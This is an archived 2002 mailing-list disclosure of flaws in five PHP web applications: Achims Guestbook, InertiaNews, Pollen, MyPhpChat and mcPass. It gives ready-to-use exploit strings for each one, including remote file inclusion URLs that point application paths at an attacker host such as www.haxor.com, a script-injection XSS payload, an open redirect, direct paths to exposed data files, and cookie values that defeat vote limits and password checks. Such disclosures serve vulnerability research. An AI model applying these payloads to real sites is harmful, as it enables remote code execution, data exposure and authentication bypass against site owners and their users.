Vulnerability Development: Achims Guestbook, InertiaNews, Pollen, MyPhpChat, mcPass

From: frog frog <leseulfrog_at_hotmail.com>
Date: 27 May 2002 08:52:10 -0000

('binary' encoding is not supported, stored as-is) Product 1 :
***********
Achims Guestbook 2.51 (and less?)
http://www.lkcc.org:8500/index.php

Problem :
- Informations Disclosure

Exploits :
- /data/*.dat (e.g. : data.dat)
- /temp/*.tmp (e.g. : ip.tmp)

Product 2 :
***********
InertiaNews 0.02 beta
http://www.brentc.com

Problem :
- Require();

Exploit :
- http://www.victim.com/inertianews_main.php?
inews_path=http://www.site.com
With http://www.site.com/inertia_sql_class.php

Product 3 :
***********
Pollen 1.4.1 (and less ?)
http://www.phpspirit.com

Problems :
- Path Disclosure
- Including file
- Distortion of the security against the multiple votes

Exploits :
- pollensondage.inc.php?app_path=non-existant-path
- Setcookie("pollensondage","")
- pollensondage.inc.php?app_path=http://www.haxor.com
with http://www.haxor.com/admin/phpext
- etc ...

Product 4 :
***********
MyPhpChat 1
http://www.creotec.com

Problems :
- XSS
- Redirection

Exploits :
- iframe.php?mynick=<script>[SCRIPT]</script>
- userlist.php?ME=http://www.site.com
- etc...

Product 5 :
***********
mcPass 1
http://www.phpforums.net

Problem :
-Distortion of security

Exploit :
- Setcookie("mcPass","AAAAA")

More details in french :
http://www.ifrance.com/kitetoua/tuto/5holes6.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%
2Fwww.ifrance.com%2Fkitetoua%2Ftuto%
2F5holes6.txt&langpair=fr%7Cen&hl=fr&ie=UTF8&oe=UTF8&prev=%
2Flanguage_tools

frog-m_at_n

Received on May 27 2002